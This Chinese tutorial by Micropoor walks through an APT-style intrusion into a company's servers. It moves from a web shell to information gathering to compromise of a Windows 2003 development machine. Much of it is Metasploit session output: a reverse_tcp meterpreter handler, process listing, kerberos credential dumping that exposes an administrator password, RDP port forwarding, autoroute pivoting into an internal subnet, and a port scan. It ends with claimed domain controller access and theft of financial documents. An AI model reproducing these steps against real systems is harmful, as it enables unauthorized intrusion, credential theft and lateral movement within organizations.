模拟诉求任务攻击

    第一个shell为目标主站shell,为08 R2,提权后遂改变主意。由于是以APT为主,并不打算以主站权限为点渗透,动作太大。不利于长期跟踪。改变为搜集情报为主。配合下一步工作。

    主站为2008 R2:

    第八课:模拟诉求任务攻击 - 图1

    主站端口为:

    搜集端口为该公司的其他分站提供下一步探测。

    • 进程搜集:红色为重点搜集源

    • 账户搜集:(已处理)
      第八课:模拟诉求任务攻击 - 图2

    • 重要路径搜集:
      (无图,路径搜集为未来可能需要dump file做准备)

    • 杀毒软件搜集: 强力的麦咖啡

    • 管理员习惯搜集:
      (无图,尽量避免与admin的fvsf)(面对面的vs是不是这么拼写?)

    • 其他搜集:
      (由于是第一个shell,具体的已经忘记了)

    第二台服务器权限:window x86 2003

    根据上一台的服务器情报搜集很快得到了一台win03

    第八课:模拟诉求任务攻击 - 图3

    • IP .3

    为一台开发机。目标仅支持 asp,无其他脚本支持。但是服务器中安装有 mysql,php 等。并且无 asp to mysql Device Drive IIS 配置中也并不支持 php。msf 反弹后,继续搜集情报。

    得到 root hash

    在实际情况中,交互的shell下运行 mysql -uroot -pxxx 无法继续交互,需要参数 e 解决这个问题。

    第八课:模拟诉求任务攻击 - 图4

    以下为部分msf操作实例

    1. msf > use exploit/multi/handler
    2. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    3. msf exploit(handler) > exploit -l
    4. meterpreter > ps
    6. Process List
    7. ============
    9. PID PPID Name Arch Session User Path
    10. --- ---- ---- ---- ------- ---- ----
    12. 0 0 [System Process]
    13. 4 0 System x86 0 NT AUTHORITY\SYSTEM
    14. 304 4 smss.exe x86 0 NT AUTHORITY\SYSTEM\SystemRoot\System32\smss.exe
    15. 352 304 csrss.exe x86 0 NT AUTHORITY\SYSTEM \?? \C:\WINDOWS\system32\csrss.exe
    16. 376 304 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \?? \C:\WINDOWS\system32\winlogon.exe
    17. 424 376 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
    18. 436 376 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
    19. 620 424 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
    20. 636 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
    21. 708 424 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
    22. 768 424 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
    23. 812 424 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
    24. 828 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
    25. 1000 424 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
    26. 1028 424 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
    27. 1160 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
    28. 1228 424 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
    29. 1252 424 sqlservr.exe x86 0 NT AUTHORITY\SYSTEM C:\PROGRA\~1\MICROS~1\MSSQL\binn\sqlservr.exe
    30. 1304 424 mysqld.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
    31. 1348 424 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
    32. 1408 424 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
    33. 1472 424 mssearch.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe
    34. 1720 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
    35. 2128 2084 explorer.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\Explorer.EXE
    36. 2208 2128 vmtoolsd.exe x86 0 xxxxxxxxxxxx\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
    37. 2232 2128 ctfmon.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\ctfmon.exe
    38. 2244 2128 sqlmangr.exe x86 0 xxxxxxxxxxxx\Administrator C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
    39. 2396 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
    40. 2440 424 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
    41. 3008 2128 cmd.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\cmd.exe
    42. 3024 3008 conime.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\conime.exe
    43. 3180 636 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe
    44. 3380 376 logon.scr x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\System32\logon.scr
    1. meterpreter > kerberos [+] Running as SYSTEM
    3. [*] Retrieving kerberos credentials kerberos credentials
    5. ====================
    7. AuthID Package Domain User Password
    10. 0;996 Negotiate NT AUTHORITY NETWORK SERVICE
    11. 0;997 Negotiate NT AUTHORITY LOCAL SERVICE
    12. 0;54469 NTLM
    13. 0;999 NTLM WORKGROUP xxxxxxxxxxxx$
    14. 0;109205 NTLM xxxxxxxxxxxx Administrator 123456
    16. meterpreter > portfwd add -l 3389 -r x.x.x.x -p 3389 #IP已做处理
    17. [*] Local TCP relay created: :3389 <-> x.x.x.x:3389
    18. meterpreter > portfwd
    20. Active Port Forwards
    22. ====================
    23. Index Local Remote Direction
    24. ----- ----- ------ ---------
    25. 1 0.0.0.0:3389 x.x.x.x:3389 Forward
    26. 1 total active port forwards.
    28. root@xxxx:/# rdesktop 127.0.0.1:3389 Autoselected keyboard map en-us
    29. Failed to negotiate protocol, retrying with plain RDP.
    30. WARNING: Remote desktop does not support colour depth 24; falling back to 16
    32. meterpreter > run autoroute -h
    34. [*] Usage: run autoroute [-r] -s subnet -n netmask
    35. [*] Examples:
    36. [*] run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to
    37. 10.10.10.1/255.255.255.0
    38. [*] run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0
    39. [*] run autoroute -s 10.10.10.1/24 # CIDR notation is also okay
    40. [*] run autoroute -p # Print active routing table
    41. [*] run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route
    42. [*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
    43. [-] Deprecation warning: This script has been replaced by the post/windows/manage/autoroute module
    45. meterpreter > ifconfig
    47. Interface 1
    49. ============
    50. Name : MS TCP Loopback interface
    51. Hardware MAC : 00:00:00:00:00:00
    52. MTU : 1520
    53. IPv4 Address : 127.0.0.1
    55. Interface 2
    58. Name : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport
    59. Hardware MAC : 00:11:25:40:77:8f
    60. MTU : 1500
    63. meterpreter > run autoroute -s 10.23.255.3 -n 255.255.255.0
    65. [*] Adding a route to 10.23.255.3/255.255.255.0...
    66. [+] Added route to 10.23.255.3/255.255.255.0 via 61.57.243.227
    67. [*] Use the -p option to list all active routes
    69. meterpreter > run autoroute -p
    71. Active Routing Table
    73. ====================
    75. Subnet Netmask Gateway
    76. ------ ------- -------
    77. 10.23.255.3 255.255.255.0 Session 3
    79. meterpreter > ifconfig
    81. Interface 1
    83. ============
    85. Name : MS TCP Loopback interface
    86. Hardware MAC : 00:00:00:00:00:00
    87. MTU : 1520
    88. IPv4 Address : 127.0.0.1
    90. Interface 2
    92. ============
    93. Name : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport
    94. Hardware MAC : 00:11:25:40:77:8f
    95. MTU : 1500
    96. IPv4 Address : 10.23.255.3 IPv4 Netmask : 255.255.255.0
    98. meterpreter >
    99. Background session 3? [y/N]
    101. msf auxiliary(tcp) > use auxiliary/scanner/portscan/tcp
    102. msf auxiliary(tcp) > show options
    103. Module options (auxiliary/scanner/portscan/tcp):
    105. Name Current Setting Required Description
    106. ---- --------------- -------- -----------
    108. CONCURRENCY 10 yes The number of concurrent ports to check per host
    109. DELAY 0 yes The delay between connections, per thread, in milliseconds
    110. JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
    111. PORTS 445,80,3389,22 yes Ports to scan (e.g. 22-25,80,110-900)
    112. RHOSTS 10.23.255.1-255 yes The target address range or CIDR identifier
    113. THREADS 10 yes The number of concurrent threads

    最终得到了域控权限,并且得到了跨段的服务器权限。得到了个人机的重要权限,以及公司财报doc。

    部分截图如下:由于时间问题,顺序可能打乱了。

    第八课:模拟诉求任务攻击 - 图5

    第八课:模拟诉求任务攻击 - 图6

    跳段, 个人机

    第八课:模拟诉求任务攻击 - 图7

    放弃权限,所有操作并未更改,下载,删除等一切损害该公司的行为。

    —By Micropoor